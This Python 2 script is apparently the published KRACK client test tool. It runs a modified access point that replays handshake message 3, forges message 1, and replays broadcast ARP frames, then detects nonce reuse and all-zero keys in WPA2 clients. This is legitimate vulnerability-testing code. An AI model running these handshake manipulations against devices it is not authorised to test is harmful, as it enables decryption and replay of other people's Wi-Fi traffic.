krack-test-client.py 25 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618
  1. #!/usr/bin/env python2
  2. # Tests for key reinstallation vulnerabilities in Wi-Fi clients
  3. # Copyright (c) 2017, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
  4. #
  5. # This code may be distributed under the terms of the BSD license.
  6. # See README for more details.
  7. import logging
  8. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  9. from scapy.all import *
  10. from libwifi import *
  11. import sys, socket, struct, time, subprocess, atexit, select, os.path
  12. from datetime import datetime
  13. from wpaspy import Ctrl
  14. # FIXME:
  15. # - If the client installs an all-zero key, we cannot reliably test the group key handshake
  16. # - We should test decryption using an all-zero key, and warn if this seems to succeed
  17. # Future work:
  18. # - Detect if the client reinstalls an all-zero encryption key (wpa_supplicant v2.4 and 2.5)
  19. # - Ability to test the group key handshake against specific clients only
  20. # - Individual test to see if the client accepts replayed broadcast traffic (without performing key reinstallation)
  21. # FIXME: We are repeating the "disable hw encryption" of FT tests
  22. USAGE = """{name} - Tool to test Key Reinstallation Attacks against clients
  23. To test wheter a client is vulnerable to Key Reinstallation Attack against
  24. the 4-way handshake or group key handshake, take the following steps:
  25. 1. Compile our modified hostapd instance. This only needs to be done once.
  26. cd ../hostapd
  27. cp defconfig .config
  28. make -j 2
  29. 2. The hardware encryption engine of some Wi-Fi NICs have bugs that interfere
  30. with our script. So disable hardware encryption by executing:
  31. cd ../krackattack/
  32. ./disable-hwcrypto.sh
  33. This only needs to be done once. It's recommended to reboot after executing
  34. this script. After plugging in your Wi-Fi NIC, use `systool -vm ath9k_htc`
  35. or similar to confirm the nohwcript/.. param has been set. We tested this
  36. script with an Intel Dual Band Wireless-AC 7260 and a TP-Link TL-WN722N.
  37. 3. Execute this script. Accepted parameters are:
  38. --group Test the group key handshake instead of the 4-way handshake
  39. --debug Show more debug messages
  40. --tptk See step 5 (forge Msg1/4 with replayed ANonce before Msg3/4)
  41. --tptk-rand See step 5 (forge Msg1/4 with random ANonce before Msg3/4)
  42. All other supplied arguments are passed on to hostapd.
  43. The only two commands you will normally have to execute are:
  44. {name}
  45. {name} --group
  46. The first one tests for key reinstallations in the 4-way handshake (see
  47. step 4), and the second tests one for key reinstallations in the group key
  48. handshake (see step 5).
  49. !! The default network name is testnetwork with password abcdefgh !!
  50. Note that you can change settings of the AP by modifying hostapd.conf.
  51. You will probably have to edit the line `interface=` to specify the
  52. correct Wi-Fi interface to use for the AP.
  53. 4. To test key reinstallations in the 4-way handshake, the script will keep
  54. sending encrypted message 3's to the client. To start the script execute:
  55. {name}
  56. Connect the the AP and the following tests will be performed automatically:
  57. 4a. The script monitors traffic sent by the client to see if the pairwise
  58. key is being reinstalled. To assure the client is sending enough frames,
  59. you can optionally ping the AP: ping 192.168.100.254 .
  60. If the client is vulnerable, the script will show something like:
  61. [19:02:37] 78:31:c1:c4:88:92: IV reuse detected (IV=1, seq=10). Client is vulnerable to pairwise key reinstallations in the 4-way handshake!
  62. If the client is patched, the script will show (this can take a minute):
  63. [18:58:11] 90:18:7c:6e:6b:20: client DOESN'T seem vulnerable to pairwise key reinstallation in the 4-way handshake.
  64. 4b. Once the client has requested an IP using DHCP, the script tests for
  65. reinstallations of the group key by sending broadcast ARP requests to the
  66. client using an already used (replayed) packet number (= IV). The client
  67. *must* request an IP using DHCP for this test to start.
  68. If the client is vulnerable, the script will show something like:
  69. [19:03:08] 78:31:c1:c4:88:92: Received 5 unique replies to replayed broadcast ARP requests. Client is vulnerable to group
  70. [19:03:08] key reinstallations in the 4-way handshake (or client accepts replayed broadcast frames)!
  71. If the client is patched, the script will show (this can take a minute):
  72. [19:03:08] 78:31:c1:c4:88:92: client DOESN'T seem vulnerable to group key reinstallation in the 4-way handshake handshake.
  73. Note that this scripts *indirectly* tests for reinstallations of the group
  74. key, by testing if replayed broadcast frames are accepted by the client.
  75. 5. Some supplicants (e.g. wpa_supplicant v2.6) are only vulnerable to pairwise
  76. key reinstallations in the 4-way handshake when a forged message 1 is
  77. injected before sending a retransmitted message 3. To test for this variant
  78. of the attack, you can execute:
  79. {name} --tptk # Inject message 1 with a replayed ANonce
  80. {name} --tptk-rand # Inject message 1 with a random ANonce
  81. Now follow the same steps as in step 4 to see if a supplicant is vulnerable.
  82. Try both these attack variants after running the normal tests of step 4.
  83. 6. To test key reinstallations in the group key handshake, the script will keep
  84. performing new group key handshakes using an identical (static) group key.
  85. The client *must* request an IP using DHCP for this test to start. To start
  86. the script execute:
  87. {name} --group
  88. Connect the the AP and all tests will be performed automatically. The
  89. working and output of the script is now similar as in step 4b.
  90. 7. Some final recommendations:
  91. 6a. Perform these tests in a room with little interference. A high amount
  92. of packet loss will make this script unreliable!
  93. 6b. Manually inspect network traffic to confirm the output of the script:
  94. - Use an extra Wi-Fi NIC in monitor mode to check pairwise key reinstalls
  95. by monitoring the IVs of frames sent by the client.
  96. - Capture traffic on the client to see if the replayed broadcast ARP
  97. requests are accepted or not.
  98. 6c. If the client being tested can use multiple Wi-Fi radios/NICs, test
  99. using a few different ones.
  100. """
  101. # After how many seconds a new message 3, or new group key message 1, is sent.
  102. # This value must match the one in `../src/ap/wpa_auth.c` (same variable name).
  103. HANDSHAKE_TRANSMIT_INTERVAL = 2
  104. #### Utility Commands ####
  105. def hostapd_command(hostapd_ctrl, cmd):
  106. rval = hostapd_ctrl.request(cmd)
  107. if "UNKNOWN COMMAND" in rval:
  108. log(ERROR, "Hostapd did not recognize the command %s. Did you (re)compile hostapd?" % cmd.split()[0])
  109. quit(1)
  110. return rval
  111. #### Main Testing Code ####
  112. class ClientState():
  113. UNKNOWN, VULNERABLE, PATCHED = range(3)
  114. IDLE, STARTED, GOT_CANARY, FINISHED = range(4)
  115. def __init__(self, clientmac, test_group_hs=False, test_tptk=False):
  116. self.mac = clientmac
  117. self.TK = None
  118. self.vuln_4way = ClientState.UNKNOWN
  119. self.vuln_group = ClientState.UNKNOWN
  120. # FIXME: Separate variable for group handshake result?
  121. self.ivs = IvCollection()
  122. self.pairkey_sent_time_prev_iv = None
  123. self.pairkey_intervals_no_iv_reuse = 0
  124. self.pairkey_tptk = test_tptk
  125. self.groupkey_reset()
  126. self.groupkey_grouphs = test_group_hs
  127. def groupkey_reset(self):
  128. self.groupkey_state = ClientState.IDLE
  129. self.groupkey_prev_canary_time = 0
  130. self.groupkey_num_canaries = 0
  131. self.groupkey_requests_sent = 0
  132. self.groupkey_patched_intervals = -1 # -1 because the first broadcast ARP requests are still valid
  133. def start_grouphs_test():
  134. self.groupkey_reset()
  135. self.groupkey_grouphs = True
  136. # TODO: Put in libwifi?
  137. def get_encryption_key(self, hostapd_ctrl):
  138. if self.TK is None:
  139. # Clear old replies and messages from the hostapd control interface
  140. while hostapd_ctrl.pending():
  141. hostapd_ctrl.recv()
  142. # Contact our modified Hostapd instance to request the pairwise key
  143. response = hostapd_command(hostapd_ctrl, "GET_TK " + self.mac)
  144. if not "FAIL" in response:
  145. self.TK = response.strip().decode("hex")
  146. return self.TK
  147. # TODO: Put in libwifi?
  148. def decrypt(self, p, hostapd_ctrl):
  149. payload = get_ccmp_payload(p)
  150. llcsnap, packet = payload[:8], payload[8:]
  151. if payload.startswith("\xAA\xAA\x03\x00\x00\x00"):
  152. # On some kernels, the virtual interface associated to the real AP interface will return
  153. # frames where the payload is already decrypted (this happens when hardware decryption is
  154. # used). So if the payload seems decrypted, just extract the full plaintext from the frame.
  155. plaintext = payload
  156. else:
  157. key = self.get_encryption_key(hostapd_ctrl)
  158. plaintext = decrypt_ccmp(p, key)
  159. # If it still fails, try an all-zero key
  160. if not plaintext.startswith("\xAA\xAA\x03\x00\x00\x00"):
  161. plaintext = decrypt_ccmp(p, "\x00" * 16)
  162. return plaintext
  163. def track_used_iv(self, p):
  164. return self.ivs.track_used_iv(p)
  165. def is_iv_reused(self, p):
  166. return self.ivs.is_iv_reused(p)
  167. def check_pairwise_reinstall(self, p):
  168. """Inspect whether the IV is reused, or whether the client seem to be patched"""
  169. # If this is gaurenteed IV reuse (and not just a benign retransmission), mark the client as vulnerable
  170. if self.ivs.is_iv_reused(p):
  171. if self.vuln_4way != ClientState.VULNERABLE:
  172. iv = dot11_get_iv(p)
  173. seq = dot11_get_seqnum(p)
  174. log(INFO, ("%s: IV reuse detected (IV=%d, seq=%d). " +
  175. "Client is vulnerable to pairwise key reinstallations in the 4-way handshake!") % (self.mac, iv, seq), color="green")
  176. self.vuln_4way = ClientState.VULNERABLE
  177. # If it's a higher IV than all previous ones, try to check if the client seems patched
  178. elif self.vuln_4way == ClientState.UNKNOWN and self.ivs.is_new_iv(p):
  179. # Save how many intervals we received a data packet without IV reset. Use twice the
  180. # transmission interval of message 3, in case one message 3 is lost due to noise.
  181. if self.pairkey_sent_time_prev_iv is None:
  182. self.pairkey_sent_time_prev_iv = p.time
  183. elif self.pairkey_sent_time_prev_iv + 2 * HANDSHAKE_TRANSMIT_INTERVAL + 1 <= p.time:
  184. self.pairkey_intervals_no_iv_reuse += 1
  185. self.pairkey_sent_time_prev_iv = p.time
  186. log(DEBUG, "%s: no pairwise IV resets seem to have occured for one interval" % self.mac)
  187. # If during several intervals all IV reset attempts failed, the client is likely patched.
  188. # We wait for enough such intervals to occur, to avoid getting a wrong result.
  189. if self.pairkey_intervals_no_iv_reuse >= 5 and self.vuln_4way == ClientState.UNKNOWN:
  190. self.vuln_4way = ClientState.PATCHED
  191. # Be sure to clarify *which* type of attack failed (to remind user to test others attacks as well)
  192. msg = "%s: client DOESN'T seem vulnerable to pairwise key reinstallation in the 4-way handshake"
  193. if self.pairkey_tptk == KRAckAttackClient.TPTK_NONE:
  194. msg += " (using standard attack)"
  195. elif self.pairkey_tptk == KRAckAttackClient.TPTK_REPLAY:
  196. msg += " (using TPTK attack)"
  197. elif self.pairkey_tptk == KRAckAttackClient.TPTK_RAND:
  198. msg += " (using TPTK-RAND attack)"
  199. log(INFO, (msg + ".") % self.mac, color="green")
  200. def mark_allzero_key(self, p):
  201. if self.vuln_4way != ClientState.VULNERABLE:
  202. iv = dot11_get_iv(p)
  203. seq = dot11_get_seqnum(p)
  204. log(INFO, ("%s: usage of all-zero key detected (IV=%d, seq=%d). " +
  205. "Client is vulnerable to (re)installation of an all-zero key in the 4-way handshake!") % (self.mac, iv, seq), color="green")
  206. log(WARNING, "%s: !!! Other tests are unreliable due to all-zero key usage, please fix this first !!!" % self.mac)
  207. self.vuln_4way = ClientState.VULNERABLE
  208. def groupkey_handle_canary(self, p):
  209. """Handle replies to the replayed ARP broadcast request (which reuses an IV)"""
  210. # Must be testing this client, and must not be a benign retransmission
  211. if not self.groupkey_state in [ClientState.STARTED, ClientState.GOT_CANARY]: return
  212. if self.groupkey_prev_canary_time + 1 > p.time: return
  213. self.groupkey_num_canaries += 1
  214. log(DEBUG, "%s: received %d replies to the replayed broadcast ARP requests" % (self.mac, self.groupkey_num_canaries))
  215. # We wait for several replies before marking the client as vulnerable, because
  216. # the first few broadcast ARP requests still use a valid (not yet used) IV.
  217. if self.groupkey_num_canaries >= 5:
  218. assert self.vuln_group != ClientState.VULNERABLE
  219. log(INFO, "%s: Received %d unique replies to replayed broadcast ARP requests. Client is vulnerable to group" \
  220. % (self.mac, self.groupkey_num_canaries), color="green")
  221. log(INFO, " key reinstallations in the %s handshake (or client accepts replayed broadcast frames)!" \
  222. % ("group key" if self.groupkey_grouphs else "4-way"), color="green")
  223. self.vuln_group = ClientState.VULNERABLE
  224. self.groupkey_state = ClientState.FINISHED
  225. # Remember that we got a reply this interval (see groupkey_track_request to detect patched clients)
  226. else:
  227. self.groupkey_state = ClientState.GOT_CANARY
  228. self.groupkey_prev_canary_time = p.time
  229. def groupkey_track_request(self):
  230. """Track when we went broadcast ARP requests, and determine if a client seems patched"""
  231. if self.vuln_group != ClientState.UNKNOWN: return
  232. hstype = "group key" if self.groupkey_grouphs else "4-way"
  233. # Show a message when we started with testing the client
  234. if self.groupkey_state == ClientState.IDLE:
  235. log(STATUS, "%s: client has IP address -> testing for group key reinstallation in the %s handshake" % (self.mac, hstype))
  236. self.groupkey_state = ClientState.STARTED
  237. if self.groupkey_requests_sent == 4:
  238. # We sent four broadcast ARP requests, and got at least one got a reply. This indicates the client is vulnerable.
  239. if self.groupkey_state == ClientState.GOT_CANARY:
  240. log(DEBUG, "%s: got a reply to broadcast ARP during this interval" % self.mac)
  241. self.groupkey_state = ClientState.STARTED
  242. # We sent four broadcast ARP requests, and didn't get a reply to any. This indicates the client is patched.
  243. elif self.groupkey_state == ClientState.STARTED:
  244. self.groupkey_patched_intervals += 1
  245. log(DEBUG, "%s: no group IV resets seem to have occured for %d interval(s)" % (self.mac, self.groupkey_patched_intervals))
  246. self.groupkey_state = ClientState.STARTED
  247. self.groupkey_requests_sent = 0
  248. # If the client appears secure for several intervals (see above), it's likely patched
  249. if self.groupkey_patched_intervals >= 5 and self.vuln_group == ClientState.UNKNOWN:
  250. log(INFO, "%s: client DOESN'T seem vulnerable to group key reinstallation in the %s handshake." % (self.mac, hstype), color="green")
  251. self.vuln_group = ClientState.PATCHED
  252. self.groupkey_state = ClientState.FINISHED
  253. self.groupkey_requests_sent += 1
  254. log(DEBUG, "%s: sent %d broadcasts ARPs this interval" % (self.mac, self.groupkey_requests_sent))
  255. class KRAckAttackClient():
  256. TPTK_NONE, TPTK_REPLAY, TPTK_RAND = range(3)
  257. def __init__(self):
  258. # Parse hostapd.conf
  259. self.script_path = os.path.dirname(os.path.realpath(__file__))
  260. try:
  261. interface = hostapd_read_config(os.path.join(self.script_path, "hostapd.conf"))
  262. except Exception as ex:
  263. log(ERROR, "Failed to parse the hostapd.conf config file")
  264. raise
  265. if not interface:
  266. log(ERROR, 'Failed to determine wireless interface. Specify one in hostapd.conf at the line "interface=NAME".')
  267. quit(1)
  268. # Set other variables
  269. self.nic_iface = interface
  270. self.nic_mon = interface + "mon"
  271. self.test_grouphs = False
  272. self.test_tptk = KRAckAttackClient.TPTK_NONE
  273. try:
  274. self.apmac = scapy.arch.get_if_hwaddr(interface)
  275. except:
  276. log(ERROR, 'Failed to get MAC address of %s. Specify an existing interface in hostapd.conf at the line "interface=NAME".' % interface)
  277. raise
  278. self.sock_mon = None
  279. self.sock_eth = None
  280. self.hostapd = None
  281. self.hostapd_ctrl = None
  282. self.dhcp = None
  283. self.group_ip = None
  284. self.group_arp = None
  285. self.clients = dict()
  286. def reset_client_info(self, clientmac):
  287. if clientmac in self.dhcp.leases:
  288. self.dhcp.remove_client(clientmac)
  289. log(DEBUG, "%s: Removing client from DHCP leases" % clientmac)
  290. if clientmac in self.clients:
  291. del self.clients[clientmac]
  292. log(DEBUG, "%s: Removing ClientState object" % clientmac)
  293. def handle_replay(self, p):
  294. """Replayed frames (caused by a pairwise key reinstallation) are rejected by the kernel. This
  295. function processes these frames manually so we can still test reinstallations of the group key."""
  296. if not Dot11WEP in p: return
  297. # Reconstruct Ethernet header
  298. clientmac = p.addr2
  299. header = Ether(dst=self.apmac, src=clientmac)
  300. header.time = p.time
  301. # Decrypt the payload and obtain LLC/SNAP header and packet content
  302. client = self.clients[clientmac]
  303. plaintext = client.decrypt(p, self.hostapd_ctrl)
  304. llcsnap, packet = plaintext[:8], plaintext[8:]
  305. # Rebuild the full Ethernet packet
  306. if llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x06":
  307. decap = header/ARP(packet)
  308. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x00":
  309. decap = header/IP(packet)
  310. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x86\xdd":
  311. decap = header/IPv6(packet)
  312. #elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x88\x8e":
  313. # # EAPOL
  314. else:
  315. return
  316. # Now process the packet as if it were a valid (non-replayed) one
  317. self.process_eth_rx(decap)
  318. def handle_mon_rx(self):
  319. p = self.sock_mon.recv()
  320. if p == None: return
  321. if p.type == 1: return
  322. # Note: we cannot verify that the NIC is indeed reusing IVs when sending the broadcast
  323. # ARP requests, because it may override them in the firmware/hardware (some Atheros
  324. # Wi-Fi NICs do no properly reset the Tx group key IV when using hardware encryption).
  325. # The first bit in FCfield is set if the frames is "to-DS"
  326. clientmac, apmac = (p.addr1, p.addr2) if (p.FCfield & 2) != 0 else (p.addr2, p.addr1)
  327. if apmac != self.apmac: return None
  328. # Reset info about disconnected clients
  329. if Dot11Deauth in p or Dot11Disas in p:
  330. self.reset_client_info(clientmac)
  331. # Inspect encrypt frames for IV reuse & handle replayed frames rejected by the kernel
  332. elif p.addr1 == self.apmac and Dot11WEP in p:
  333. if not clientmac in self.clients:
  334. self.clients[clientmac] = ClientState(clientmac, test_group_hs=self.test_grouphs, test_tptk=self.test_tptk)
  335. client = self.clients[clientmac]
  336. iv = dot11_get_iv(p)
  337. log(DEBUG, "%s: transmitted data using IV=%d (seq=%d)" % (clientmac, iv, dot11_get_seqnum(p)))
  338. if decrypt_ccmp(p, "\x00" * 16).startswith("\xAA\xAA\x03\x00\x00\x00"):
  339. client.mark_allzero_key(p)
  340. if not self.test_grouphs:
  341. client.check_pairwise_reinstall(p)
  342. if client.is_iv_reused(p):
  343. self.handle_replay(p)
  344. client.track_used_iv(p)
  345. def process_eth_rx(self, p):
  346. self.dhcp.reply(p)
  347. self.group_arp.reply(p)
  348. clientmac = p[Ether].src
  349. if not clientmac in self.clients: return
  350. client = self.clients[clientmac]
  351. if ARP in p and p[ARP].pdst == self.group_ip:
  352. client.groupkey_handle_canary(p)
  353. def handle_eth_rx(self):
  354. p = self.sock_eth.recv()
  355. if p == None or not Ether in p: return
  356. self.process_eth_rx(p)
  357. def configure_interfaces(self):
  358. log(STATUS, "Note: disable Wi-Fi in network manager & disable hardware encryption. Both may interfere with this script.")
  359. # 0. Some users may forget this otherwise
  360. subprocess.check_output(["rfkill", "unblock", "wifi"])
  361. # 1. Remove unused virtual interfaces to start from a clean state
  362. subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
  363. # 2. Configure monitor mode on interfaces
  364. subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
  365. # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
  366. # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
  367. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  368. time.sleep(0.5)
  369. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  370. subprocess.check_output(["ifconfig", self.nic_mon, "up"])
  371. def run(self, test_grouphs=False, test_tptk=False):
  372. self.configure_interfaces()
  373. # Open the patched hostapd instance that carries out tests and let it start
  374. log(STATUS, "Starting hostapd ...")
  375. try:
  376. self.hostapd = subprocess.Popen([
  377. os.path.join(self.script_path, "../hostapd/hostapd"),
  378. os.path.join(self.script_path, "hostapd.conf")]
  379. + sys.argv[1:])
  380. except:
  381. if not os.path.exists("../hostapd/hostapd"):
  382. log(ERROR, "hostapd executable not found. Did you compile hostapd? Use --help param for more info.")
  383. raise
  384. time.sleep(1)
  385. try:
  386. self.hostapd_ctrl = Ctrl("hostapd_ctrl/" + self.nic_iface)
  387. self.hostapd_ctrl.attach()
  388. except:
  389. log(ERROR, "It seems hostapd did not start properly, please inspect its output.")
  390. log(ERROR, "Did you disable Wi-Fi in the network manager? Otherwise hostapd won't work.")
  391. raise
  392. self.sock_mon = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
  393. self.sock_eth = L2Socket(type=ETH_P_ALL, iface=self.nic_iface)
  394. # Let scapy handle DHCP requests
  395. self.dhcp = DHCP_sock(sock=self.sock_eth,
  396. domain='krackattack.com',
  397. pool=Net('192.168.100.0/24'),
  398. network='192.168.100.0/24',
  399. gw='192.168.100.254',
  400. renewal_time=600, lease_time=3600)
  401. # Configure gateway IP: reply to ARP and ping requests
  402. subprocess.check_output(["ifconfig", self.nic_iface, "192.168.100.254"])
  403. # Use a dedicated IP address for our broadcast ARP requests and replies
  404. self.group_ip = self.dhcp.pool.pop()
  405. self.group_arp = ARP_sock(sock=self.sock_eth, IP_addr=self.group_ip, ARP_addr=self.apmac)
  406. # If applicable, inform hostapd that we are testing the group key handshake
  407. if test_grouphs:
  408. hostapd_command(self.hostapd_ctrl, "START_GROUP_TESTS")
  409. self.test_grouphs = True
  410. # If applicable, inform hostapd that we are testing for Temporal PTK (TPTK) construction behaviour
  411. self.test_tptk = test_tptk
  412. if self.test_tptk == KRAckAttackClient.TPTK_REPLAY:
  413. hostapd_command(self.hostapd_ctrl, "TEST_TPTK")
  414. elif self.test_tptk == KRAckAttackClient.TPTK_RAND:
  415. hostapd_command(self.hostapd_ctrl, "TEST_TPTK_RAND")
  416. log(STATUS, "Ready. Connect to this Access Point to start the tests. Make sure the client requests an IP using DHCP!", color="green")
  417. # Monitor both the normal interface and virtual monitor interface of the AP
  418. self.next_arp = time.time() + 1
  419. while True:
  420. sel = select.select([self.sock_mon, self.sock_eth], [], [], 1)
  421. if self.sock_mon in sel[0]: self.handle_mon_rx()
  422. if self.sock_eth in sel[0]: self.handle_eth_rx()
  423. # Periodically send the replayed broadcast ARP requests to test for group key reinstallations
  424. if time.time() > self.next_arp:
  425. self.next_arp = time.time() + HANDSHAKE_TRANSMIT_INTERVAL
  426. for client in self.clients.values():
  427. # Also keep injecting to PATCHED clients (just to be sure they keep rejecting replayed frames)
  428. if client.vuln_group != ClientState.VULNERABLE and client.mac in self.dhcp.leases:
  429. clientip = self.dhcp.leases[client.mac]
  430. client.groupkey_track_request()
  431. log(INFO, "%s: sending broadcast ARP to %s from %s" % (client.mac, clientip, self.group_ip))
  432. request = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, hwsrc=self.apmac, psrc=self.group_ip, pdst=clientip)
  433. self.sock_eth.send(request)
  434. def stop(self):
  435. log(STATUS, "Closing hostapd and cleaning up ...")
  436. if self.hostapd:
  437. self.hostapd.terminate()
  438. self.hostapd.wait()
  439. if self.sock_mon: self.sock_mon.close()
  440. if self.sock_eth: self.sock_eth.close()
  441. def cleanup():
  442. attack.stop()
  443. def argv_get_interface():
  444. for i in range(len(sys.argv)):
  445. if not sys.argv[i].startswith("-i"):
  446. continue
  447. if len(sys.argv[i]) > 2:
  448. return sys.argv[i][2:]
  449. else:
  450. return sys.argv[i + 1]
  451. return None
  452. def argv_pop_argument(argument):
  453. if not argument in sys.argv: return False
  454. idx = sys.argv.index(argument)
  455. del sys.argv[idx]
  456. return True
  457. def hostapd_read_config(config):
  458. # Read the config, get the interface name, and verify some settings.
  459. interface = None
  460. with open(config) as fp:
  461. for line in fp.readlines():
  462. line = line.strip()
  463. if line.startswith("interface="):
  464. interface = line.split('=')[1]
  465. elif line.startswith("wpa_pairwise=") or line.startswith("rsn_pairwise"):
  466. if "TKIP" in line:
  467. log(ERROR, "ERROR: We only support tests using CCMP. Only include CCMP in %s config at the following line:" % config)
  468. log(ERROR, " >%s<" % line, showtime=False)
  469. quit(1)
  470. # Parameter -i overrides interface in config.
  471. # FIXME: Display warning when multiple interfaces are used.
  472. if argv_get_interface() is not None:
  473. interface = argv_get_interface()
  474. return interface
  475. if __name__ == "__main__":
  476. if "--help" in sys.argv or "-h" in sys.argv:
  477. print USAGE.format(name=sys.argv[0])
  478. quit(1)
  479. test_grouphs = argv_pop_argument("--group")
  480. test_tptk_replay = argv_pop_argument("--tptk")
  481. test_tptk_rand = argv_pop_argument("--tptk-rand")
  482. while argv_pop_argument("--debug"):
  483. global_log_level -= 1
  484. test_tptk = KRAckAttackClient.TPTK_NONE
  485. if test_tptk_replay and test_tptk_rand:
  486. log(ERROR, "Please only specify --tptk or --tptk-rand")
  487. elif test_tptk_replay:
  488. test_tptk = KRAckAttackClient.TPTK_REPLAY
  489. elif test_tptk_rand:
  490. test_tptk = KRAckAttackClient.TPTK_RAND
  491. attack = KRAckAttackClient()
  492. atexit.register(cleanup)
  493. attack.run(test_grouphs=test_grouphs, test_tptk=test_tptk)